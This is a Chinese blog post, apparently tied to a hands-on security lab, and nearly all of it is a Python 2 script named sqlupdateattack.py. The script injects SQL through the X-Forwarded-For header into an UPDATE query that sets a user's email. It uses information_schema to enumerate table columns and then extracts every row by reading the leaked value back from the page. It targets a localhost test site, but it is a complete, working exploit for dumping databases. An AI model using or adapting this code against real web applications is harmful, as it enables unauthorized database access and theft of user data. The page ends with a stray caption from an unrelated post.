版權聲明:轉載請注明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396413
參考實驗:
http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0 sqlupdateattack.py#!/usr/bin/python
# -*- coding: utf-8 -*-
import HTMLParser
import urlparse
import urllib
import urllib2
import cookielib
import string
import binascii
import re
import time
#截取字元串中startStr,endStr中間的值
def GetMiddleStr(content,startStr,endStr):
patternStr = r'%s(.+?)%s'%(startStr,endStr)
p = re.compile(patternStr,re.S)
m= re.search(p,content)
if m:
return m.group(1)
#跑表數量
def count(table_name,mode):
if mode==0:
tn16=binascii.b2a_hex(table_name.encode("utf8"))
sql_count='1.1.1.1\',email=(select count(COLUMN_NAME) from information_schema.columns where table_name=0x'+tn16+' and table_schema=database()) where username=\'admin\'#'
else:
if table_name=='testuser':
sql_count='1.1.1.1\',email=(select count(*) from ( select * from testuser) as x) where username=\'admin\'#'
else:
sql_count='1.1.1.1\',email=(select count(*) from '+table_name+') where username=\'admin\'#'
return sql_count
#跑表的列名用到的sql注入語句
def sql_column(table_name,num):
tn16=binascii.b2a_hex(table_name.encode("utf8"))
sql_column='1.1.1.1\',email=(select COLUMN_NAME from information_schema.columns where table_name=0x'+tn16+' limit '+str(num)+',1 ) where username=\'admin\'#'
return sql_column
#跑表的内容
def sql_data(table_name,column,num):
sql_data='1.1.1.1\',email=(select '+column+' from '+table_name+' order by id limit '+str(num)+',1) where username=\'admin\'#'
return sql_data
#跑表的内容(與update所用表(即示範中的testuser表)沖突使用)
def sql_users(column,num):
sql_users='1.1.1.1\',email=(select '+column+' from ( select * from testuser) as x order by ID limit '+str(num)+',1) where username=\'admin\'#'
return sql_users
#注入,先模拟登陸後截取結果并寫入檔案
def inject(posturl,sql):
try:
cookieJar=cookielib.CookieJar()
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04',
'X-Forwarded-For' : sql}
postData = {'uname' : 'admin',
'passwd' : 'admin',
'submit' : 'Submit' }
postData = urllib.urlencode(postData)
request = urllib2.Request(posturl, postData, headers)
result = opener.open(request)
str=result.read()
m=GetMiddleStr(str,'your email is:','</font><br>')
return m
except Exception,err:
err = 'weberror'
raise Exception(err)
if __name__ == '__main__':
posturl = 'http://127.0.0.1/test/index.php'
table_name=['testuser', 'test1']
#先跑表的各字段名,并存放到臨時的column_name中
column_name=[]
for table in table_name:
sql_count=inject(posturl,count(table,0))
print table+":\r\n"
for num in range(int(sql_count)):
sql=sql_column(table,num)
try:
m=inject(posturl,sql)
column_name.append(m)
except TypeError:
print 'error'
print column_name
#跑對應的資料
for column in column_name:
print table+"|||"+column+":"
for num in range(int(inject(posturl,count(table,1)))):
if table=='testuser':
sql=sql_users(column,num)
else:
sql=sql_data(table,column,num)
m=inject(posturl,sql)
print m
print "\n"
![27. Remove Element(清單)題目代碼[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)